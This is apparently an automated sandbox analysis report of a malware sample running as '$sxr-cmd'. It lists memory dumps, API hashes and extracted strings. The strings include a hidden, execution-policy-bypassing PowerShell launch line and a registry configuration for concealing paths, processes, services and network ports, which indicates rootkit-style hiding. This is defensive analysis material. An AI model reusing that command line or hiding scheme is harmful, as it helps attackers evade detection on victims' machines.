                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsicmp
                                                                                                                      • String ID: GeToken: (%x) '%s'
                                                                                                                      • API String ID: 2081463915-1994581435
                                                                                                                      • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                      • Instruction ID: fc53c2c0b8737e5842c240469c083d979781ba09aedddded036022e021dcb855
                                                                                                                      • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                      • Instruction Fuzzy Hash: DC71AC25E0CE4689FBA49B2CA844279A6E0AF10F75F541536D55EC26F0EF3CACA18340
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907026637.0000020D0B5F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000020D0B5F0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b5f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                      • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                                                                                      • API String ID: 3215553584-1407779936
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: OpenToken$CloseProcessThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2991381754-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InformationQueryToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4239771691-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileInformation$HandleQueryVolume
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2149833895-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InformationQueryToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4239771691-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                      • String ID: SOFTWARE\$sxrconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                      • API String ID: 106492572-3028563969
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF6154FF52A,00000000,00000000,?,00000000,?,00007FF6154FE626,?,?,00000000,00007FF615501F69), ref: 00007FF6154FF8DE
                                                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF6154FF8FB
                                                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF6154FF951
                                                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF6154FF96B
                                                                                                                      • wcschr.MSVCRT ref: 00007FF6154FFA8E
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF6154FFB14
                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF6154FFB2D
                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF6154FFBEA
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF6154FF996
                                                                                                                        • Part of subcall function 00007FF615500010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF61551849D,?,?,?,00007FF61551F0C7), ref: 00007FF615500045
                                                                                                                        • Part of subcall function 00007FF615500010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF61551F0C7,?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF615500071
                                                                                                                        • Part of subcall function 00007FF615500010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF615500092
                                                                                                                        • Part of subcall function 00007FF615500010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6155000A7
                                                                                                                        • Part of subcall function 00007FF615500010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF615500181
                                                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF61550D401
                                                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF61550D41B
                                                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF61550D435
                                                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF61550D480
                                                                                                                      Strings
                                                                                                                      • =,;, xrefs: 00007FF6154FF8C8
                                                                                                                      • C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZX, xrefs: 00007FF6154FF90E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                                      • String ID: =,;$C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZX
                                                                                                                      • API String ID: 3964947564-2248143620
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsicmp$iswspacewcschr
                                                                                                                      • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                      • API String ID: 840959033-3627297882
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsicmp$EnvironmentVariable
                                                                                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                                      • API String ID: 198002717-267741548
                                                                                                                      • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                                      • Instruction ID: a6802bdb260c72392a950daa971ed4db5789221b30bc02e2994bfd9dc833cd88
                                                                                                                      • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                                      • Instruction Fuzzy Hash: 3851FD39A08E43C6EA149F25A810279EB60FF59FA5F85A436D90EC3675DF2CE9448740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: iswdigitiswspacewcschr
                                                                                                                      • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                                      • API String ID: 1595556998-2755026540
                                                                                                                      • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                      • Instruction ID: 5a7a24a106ce09d4d40cd98adac353e6175cb30843459e6879d33fa2e65f6e41
                                                                                                                      • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                      • Instruction Fuzzy Hash: 06227E69D08E56A6FA648B2DA440279E6A0BF04FB4F415133D95DC22F4EF3CEC61DB90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                                                      • String ID: "$=,;
                                                                                                                      • API String ID: 3545743878-4143597401
                                                                                                                      • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                      • Instruction ID: 64a34d12556e3c734215cda40c15c56a52d3dffad125bc86f3187ca62770e5ca
                                                                                                                      • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                      • Instruction Fuzzy Hash: FBC18D65A09E92C2FB655B19D000379F6E0FF49F64F499036CAAE877A4EF3CAC558700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentThread$AddressHandleLibraryLoadModuleProc
                                                                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$Sysprep_Clean_Validate_Opk$advapi32.dll$ntdll.dll$sechost.dll$spopk.dll
                                                                                                                      • API String ID: 1741086925-759476645
                                                                                                                      • Opcode ID: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                                      • Instruction ID: 326dc180ffae68a3698c42e2bb486c49780219fc6c08e975c7033b44e4ceec5c
                                                                                                                      • Opcode Fuzzy Hash: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                                      • Instruction Fuzzy Hash: 8041986521BF4AA0FA04DBD4E86D6E82337B744B64FC45423D54D1E1B3BE7B8289D360
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentFormatMessageThread
                                                                                                                      • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                      • API String ID: 2411632146-3173542853
                                                                                                                      • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                      • Instruction ID: 511c082119e5fedb2a993a2997cd065124dde93d68b6af1cc767cc8040cd502b
                                                                                                                      • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                      • Instruction Fuzzy Hash: F0617E69A09E42C5EA64DF61A4845B5ABA0FF44FA8F480136DA0D87B78DF3CE941CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                      • String ID: d
                                                                                                                      • API String ID: 2005889112-2564639436
                                                                                                                      • Opcode ID: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                                      • Instruction ID: d273b7b33453f497520c7649af28154c3e077199ecb6268de16b7456aa80a0fb
                                                                                                                      • Opcode Fuzzy Hash: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                                      • Instruction Fuzzy Hash: 81515A72609B4493FB14CFA2E54839AB3B2F789FA4F848125DA4D4BB15EF3DC0568744
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile_open_osfhandle
                                                                                                                      • String ID: con
                                                                                                                      • API String ID: 2905481843-4257191772
                                                                                                                      • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                      • Instruction ID: 82a5cf1588d834431d52ddf4c23b01662e4207ca4d5f36ed2d61eedcf12bb714
                                                                                                                      • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                      • Instruction Fuzzy Hash: B3717836608A41CAE7608F24E440679FBA4FB49FB5F544235DA5EC27A5DF3CD849CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3829876242-3916222277
                                                                                                                      • Opcode ID: 001fdc610d61f38e35d8eb850943c57dbc85407de928d369b3e64990ecac9e6a
                                                                                                                      • Instruction ID: 0025b68514c8c5cac08e43c93fa05bfbf9a60519e6f4a277ed00fffb906e174d
                                                                                                                      • Opcode Fuzzy Hash: 001fdc610d61f38e35d8eb850943c57dbc85407de928d369b3e64990ecac9e6a
                                                                                                                      • Instruction Fuzzy Hash: E4615D2AA08A4286EA149F11945417EFBB1FFC9FA4F468135DE0E877A5DF3CED058B40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
